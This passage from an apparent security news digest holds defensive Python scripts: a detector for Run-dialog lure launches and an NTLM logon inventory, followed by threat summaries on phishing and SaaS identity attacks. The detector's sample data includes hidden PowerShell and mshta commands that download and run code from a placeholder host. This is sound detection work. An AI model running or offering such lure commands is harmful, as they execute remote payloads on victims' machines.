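    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def assess_command(command_line: str) -> tuple[int, list]:
    """One point per distinct cue present in the command line."""
    score, reasons = 0, []
    for pattern, label in CUES:
        if pattern.search(command_line):
            score += 1
            reasons.append(label)
    return score, reasons

def assess_process_event(event: dict) -> Verdict:
    """event uses Sysmon Event ID 1 field names: Image, ParentImage, CommandLine.
    Two points for an interpreter spawned by the shell, plus one per command-line cue."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    score, reasons = assess_command(event.get("CommandLine", ""))
    if parent in USER_LAUNCHERS and image in INTERPRETERS:
        score += 2
        reasons.insert(0, f"{image} spawned by {parent} (Run dialog or shell)")
    return Verdict(score >= 3, score, reasons)

def assess_runmru(values: dict) -> list:
    """Forensic check of HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU:
    each value holds a Run-dialog entry with a trailing '\\1' marker. Returns (command, reasons)
    for entries carrying two or more cues."""
    hits = []
    for name, data in values.items():
        if name == "MRUList":
            continue
        command = data[:-2] if data.endswith("\\1") else data
        score, reasons = assess_command(command)
        if score >= 2:
            hits.append((command, reasons))
    return hits

# Constructed samples: two lure-style launches, one legitimate build script, one harmless Run entry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/verify)" '
                    '# I am not a robot - reCAPTCHA Verification ID: 7811'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/check.hta"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad"},
]
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iex (irm https://example.invalid/v)"\\1',
    "MRUList": "ba",
}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        v = assess_process_event(ev)
        print(f"{'ALERT' if v.suspicious else 'ok   '} score={v.score} {ev['CommandLine'][:60]!r} {v.reasons}")
    print("RunMRU hits:", assess_runmru(SAMPLE_RUNMRU))
```

The parent/child check alone is noisy, since administrators type powershell into Run as well, which is why a finding also needs at least one command-line cue. Command lines should be normalized (quotes, caret escapes, environment variables) before scoring in production, and the RunMRU check is useful after the fact on a host where process telemetry was not yet enabled.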
Windows Moves Toward Disabling NTLM Authentication by Default
Microsoft is advancing plans to reduce reliance on the legacy NTLM authentication protocol by disabling it by default in future Windows releases. NTLM has long been used as a fallback mechanism, but its design exposes environments to well-known attack techniques. The shift reflects a broader move toward modern, identity-centric authentication models across Windows ecosystems.
Key Insights
NTLM is considered a legacy protocol with known weaknesses that attackers can exploit.
Future Windows versions will favor modern authentication methods such as Kerberos.
Microsoft is taking a phased approach to help organizations identify and reduce NTLM usage.
New authentication capabilities are being introduced to cover scenarios where NTLM was historically required.
NTLM will remain available for legacy compatibility but must be explicitly enabled.
Further Reading: Microsoft Tech Community
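Before NTLM is turned off, an organization needs to know who still depends on it. Microsoft's audit policies ("Network security: Restrict NTLM: Audit ...") feed the NTLM operational log; a simpler inventory can be built from Security event 4624, where "Authentication Package" is NTLM, or is Negotiate with "Package Name (NTLM only)" set to NTLM V1, NTLM V2 or LM (Kerberos logons show "-" in that field). The script below is an added example, not Microsoft's tooling; the 4624 field names are real, the event records are constructed.

```python
"""Inventory NTLM logons from Security event 4624 records so dependencies can be fixed before NTLM is
disabled. Field names match the 4624 event; the records themselves are constructed."""
from collections import defaultdict

NTLM_PACKAGE_NAMES = {"NTLM V1", "NTLM V2", "LM"}
WEAK_PACKAGE_NAMES = {"NTLM V1", "LM"}   # downgrade-prone versions to remove first

def is_ntlm_logon(event: dict) -> bool:
    """True when the logon used NTLM directly, or Negotiate fell back to NTLM.
    Kerberos logons carry '-' in 'Package Name (NTLM only)'."""
    if event.get("EventID") != 4624:
        return False
    return (event.get("Authentication Package") == "NTLM"
            or event.get("Package Name (NTLM only)", "-") in NTLM_PACKAGE_NAMES)

def summarize_ntlm(events) -> dict:
    """Group NTLM logons by (account, source address): counts, logon types, workstations, weak hits."""
    summary = defaultdict(lambda: {"logons": 0, "weak": 0, "logon_types": set(), "workstations": set()})
    for e in events:
        if not is_ntlm_logon(e):
            continue
        s = summary[(e.get("Account Name", "?"), e.get("Source Network Address", "-"))]
        s["logons"] += 1
        s["weak"] += e.get("Package Name (NTLM only)") in WEAK_PACKAGE_NAMES
        s["logon_types"].add(e.get("Logon Type"))
        s["workstations"].add(e.get("Workstation Name", "-"))
    return dict(summary)

def weak_ntlm_sources(events) -> list:
    """(account, source) pairs still using NTLMv1 or LM."""
    return sorted(k for k, s in summarize_ntlm(events).items() if s["weak"])

# Constructed 4624/4625 records: one Kerberos logon, three direct NTLM logons (one NTLMv1),
# one Negotiate logon that fell back to NTLM, and one failed logon that must not be counted.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Logon Type": 3, "Account Name": "alice", "Authentication Package": "Kerberos",
     "Package Name (NTLM only)": "-", "Workstation Name": "WS-001", "Source Network Address": "10.0.1.11"},
    {"EventID": 4624, "Logon Type": 3, "Account Name": "svc-backup", "Authentication Package": "NTLM",
     "Package Name (NTLM only)": "NTLM V2", "Workstation Name": "BACKUP01", "Source Network Address": "10.0.0.5"},
    {"EventID": 4624, "Logon Type": 3, "Account Name": "svc-scan", "Authentication Package": "NTLM",
     "Package Name (NTLM only)": "NTLM V1", "Workstation Name": "MFP-LOBBY", "Source Network Address": "10.0.0.9"},
    {"EventID": 4624, "Logon Type": 3, "Account Name": "svc-backup", "Authentication Package": "NTLM",
     "Package Name (NTLM only)": "NTLM V2", "Workstation Name": "BACKUP01", "Source Network Address": "10.0.0.5"},
    {"EventID": 4624, "Logon Type": 3, "Account Name": "bob", "Authentication Package": "Negotiate",
     "Package Name (NTLM only)": "NTLM V2", "Workstation Name": "WS-042", "Source Network Address": "10.0.1.42"},
    {"EventID": 4625, "Logon Type": 3, "Account Name": "svc-scan", "Authentication Package": "NTLM",
     "Package Name (NTLM only)": "NTLM V1", "Workstation Name": "MFP-LOBBY", "Source Network Address": "10.0.0.9"},
]

if __name__ == "__main__":
    for (account, source), s in sorted(summarize_ntlm(SAMPLE_EVENTS).items()):
        flag = " WEAK" if s["weak"] else ""
        print(f"{account:<12} {source:<12} logons={s['logons']} types={sorted(s['logon_types'])}"
              f" from={sorted(s['workstations'])}{flag}")
```

NTLM V1 and LM entries should be fixed first. The remaining NTLM V2 sources are typically service accounts or devices that reach hosts by IP address, where Kerberos has no service principal name to request a ticket for; those make up the compatibility list to work through before the default flips.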
NSA Releases Initial Zero Trust Implementation Guidelines
The U.S. National Security Agency has released the first set of guidance in a new series aimed at helping organizations implement zero trust principles in a structured, practical way. These initial materials focus on establishing visibility and understanding of environments before moving into enforcement, providing a foundation for more mature zero trust capabilities over time.
Key Insights
The first releases introduce a primer and a discovery-focused phase to help organizations map assets, data, services, and access patterns.
Emphasis is placed on understanding the environment before applying controls or policy enforcement.
The guidance is modular, allowing organizations to adopt elements based on their maturity and priorities.
Later phases are expected to build on this foundation with more detailed implementation activities.
While developed with government use cases in mind, the guidance is applicable to broader enterprise zero trust efforts.
Further Reading: NSA
FBI Launches Operation Winter SHIELD to Boost Cyber Resilience
The FBI has introduced Operation Winter SHIELD, a nationwide initiative focused on strengthening cyber resilience across public and private organizations. Drawing directly from real-world investigations, the effort highlights common weaknesses attackers exploit and outlines practical defensive actions aimed at reducing exposure to both criminal and state-linked cyber activity.
Key Insights
Operation Winter SHIELD distills lessons learned from FBI cyber investigations into a concise set of high-impact actions.
The initiative focuses on reducing common attack paths used in ransomware, espionage, and disruptive campaigns.
Recommendations span identity protection, system hardening, and improved visibility across IT and operational technology environments.
The campaign emphasizes proactive preparation rather than reactive incident response.
Winter SHIELD supports broader efforts to improve national cyber resilience through public–private collaboration.
Further Reading: FBI
Fake Dropbox Emails Used to Steal Login Details
Attackers are circulating phishing emails that impersonate Dropbox and attempt to trick recipients into handing over their account credentials. The messages often look like routine business communications and include a PDF attachment. When opened, the document directs the user to a fake Dropbox login page designed to capture usernames and passwords.
Key Points
Phishing emails are crafted to look like legitimate Dropbox notifications or file-sharing messages.
PDF attachments are used to make the email appear business-related and trustworthy.
Links inside the document lead to counterfeit login pages.
Entered credentials are captured by attackers and can be reused to access other accounts.
The technique relies on familiar brands and file formats to lower suspicion.
Further Reading: CybersecurityNews
ShinyHunters-Linked Attacks Target SaaS Environments
Threat intelligence analysis highlights how activity associated with the ShinyHunters cybercrime ecosystem is increasingly focused on compromising software-as-a-service environments. Rather than exploiting technical vulnerabilities, these campaigns rely on social engineering and identity abuse to gain access to cloud platforms, allowing attackers to move laterally across connected services and exfiltrate sensitive data for extortion.
Key Insights
ShinyHunters-linked operations rely heavily on phishing and voice-based social engineering to steal SSO credentials and MFA codes.
Once identities are compromised, attackers abuse trust relationships to access multiple SaaS applications.
These attacks are identity-centric and often leave little traditional endpoint evidence.
Stolen credentials and session access enable large-scale data theft without exploiting software flaws.
Identity visibility and rapid response are critical to limiting impact once access is gained.
Further Reading: Google Cloud
SLH Campaign Blends Vishing With AiTM Phishing for Account Takeover
Threat researchers analyzed a recent campaign attributed to the group tracked as SLH that combines live phone-based social engineering with adversary-in-the-middle phishing. Attackers initiate contact by posing as internal IT support, then guide victims to a phishing site designed to capture credentials, MFA codes, and active session tokens. With this access, the actors can move quickly across connected cloud services using the victim’s identity.
Key Insights
The campaign starts with phone calls impersonating IT staff to establish trust.
Victims are steered to a phishing site that captures credentials and MFA in real time.
Stolen session tokens enable immediate access to SSO-protected services.
The hybrid vishing-plus-phishing approach increases success and evasion.
Identity abuse allows attackers to expand access without deploying malware.
Further Reading: Push Security
